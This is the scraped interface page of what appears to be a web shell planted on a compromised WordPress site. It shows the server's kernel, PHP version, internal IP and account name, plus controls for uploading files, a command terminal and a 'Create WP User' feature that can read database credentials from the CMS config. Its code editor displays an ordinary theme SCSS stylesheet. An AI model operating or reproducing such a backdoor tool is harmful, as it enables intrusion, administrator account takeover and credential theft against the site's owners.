Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
ocieplenia.konin.pl
/
wp-content
/
themes
/
onetone
/
lib
/
customizer
/
assets
/
sass
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
styles.scss
1.85 KB
-rw-r--r--
2018-03-20 20:23
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
styles.scss
/* * Mie Customizer Framework Styles * @author alispx **/ @import "compass/css3"; .customize-control { margin-bottom: 20px; .wp-picker-container input[type=text].wp-color-picker { padding: 3px 5px !important; min-height: 18px; } input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=url], input[type=date], textarea, select { border-radius: 3px; border: 1px solid #ccc; background-color: #fff; min-height: 35px; margin: 0; padding: 6px 8px; width: 100%; } input[type=checkbox], input[type=radio] { border: 1px solid #bbb; background: #fff; color: #555; clear: none; cursor: pointer; display: inline-block; line-height: 0; height: 16px; margin: -4px 4px 0 0; min-width: 16px; outline: 0; padding: 0!important; text-align: center; vertical-align: middle; width: 16px; -webkit-appearance: none; @include transition(.05s border-color ease-in-out); } /* Slider Element */ .mie-slider { width: 75% !important; display: inline-block; } .mie-slider-value { width: 20% !important; min-height: 30px !important; } } .chosen-drop{ position: relative!important; display: none; } .chosen-container-active.chosen-with-drop .chosen-drop { display: block } .chosen-container-single .chosen-single { padding: 3px 0 2px 8px !important; height: 35px !important; div { top:5px !important; } } .image-radio-control{ .control-image{ position: relative; display: block; img{ width:100%; max-width: 100%; } &:after{ content:" "; position: absolute; top:0; left:0; right: 0; bottom:0; background: rgba(255,255,255,.5); box-shadow: inset 0 0 0 5px #2ea2cc; opacity:0; transition: .2s ease; z-index: 1; } } input:checked ~ .control-image{ &:after{ opacity: 1; } } }
关闭
保存